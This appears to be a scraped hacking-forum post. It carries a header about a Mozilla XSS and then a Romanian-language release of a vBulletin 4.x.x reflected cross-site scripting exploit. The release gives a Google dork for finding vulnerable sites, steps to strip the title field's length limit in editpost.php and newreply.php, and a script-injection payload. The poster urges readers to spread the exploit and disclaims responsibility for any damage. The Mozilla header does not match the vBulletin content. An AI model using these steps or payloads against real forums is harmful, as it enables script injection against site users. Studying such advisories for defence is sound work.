Leaderboard

# Exploit: *.mozilla.org - Cross-Site-Scripting Reflected # Author: akkiliON # URL Link: https://mozilla.org # PoC: Reported

Dupa mai multe mesaje primite, am decis sa public vulnerabilitatile gasite in vBulletin, poate unii o sa se bucure, altii nu. Acesta fiind primul meu exploit, sper sa va placa. Eu zic sa raspandim exploit-ul, facem putina reclama RST-ului. ########################################################################################## # -#-#- vBulletin 4.x.x - Multiple Cross-Site-Scripting Vulnerabilities -#-#- # -#-#- RSTforums.com -#-#- # # # • Exploit Title: vBulletin 4.x.x - Multiple Cross-Site-Scripting Vulnerabilities - Reflected # • Google Dork: "Powered by vBulletin® Version 4.x.x" # • Date: 13.08.2013 # • Exploit Author: Sensi # • Website: RSTforums.com # • Software Link: http://vbulletin.com/ # • Version: vBulletin 4.x.x # • Tested on: Linux & Windows # • Special thanks to: [URL="https://rstforums.com/forum/members/kalash1337/"]Kalash1337 [/URL] # ########################################################################################## # # ### First XSS ### # # Step 1: Go to -> Any post -> Press Editpost(advanced editor) -> Inspect 'title' element source and delete maxlength="85" # (Direct Link:) [url]http://localhost/[/url][path]/editpost.php?p=[post number]&do=editpost # # Step 2: Add a malicious vector on title element. # (Example:) sensisensisensisensisensisensisensisensisensisensisensisensisensisensisensisensisensi"><script>alert(/sensi @ RSTforums.com/);</script> # #________________________________________________________________________________________ #======================================================================================== #---------------------------------------------------------------------------------------- # # ### Second XSS ### # # Step 1: Go to -> Any thread -> Press post new reply(advanced editor) -> Inspect 'title' element source and delete maxlength="85" # (Direct Link:) [url]http://localhost/[/url][path]/newreply.php?p=[post number]&noquote=1 # # Step 2: Add a malicious vector on title element. # (Example:) sensisensisensisensisensisensisensisensisensisensisensisensisensisensisensisensisensi"><script>alert(/sensi @ RSTforums.com/);</script> ########################################################################################## # # # Author will be not responsible for any damage caused! User assumes all responsibility. # # ##########################################################################################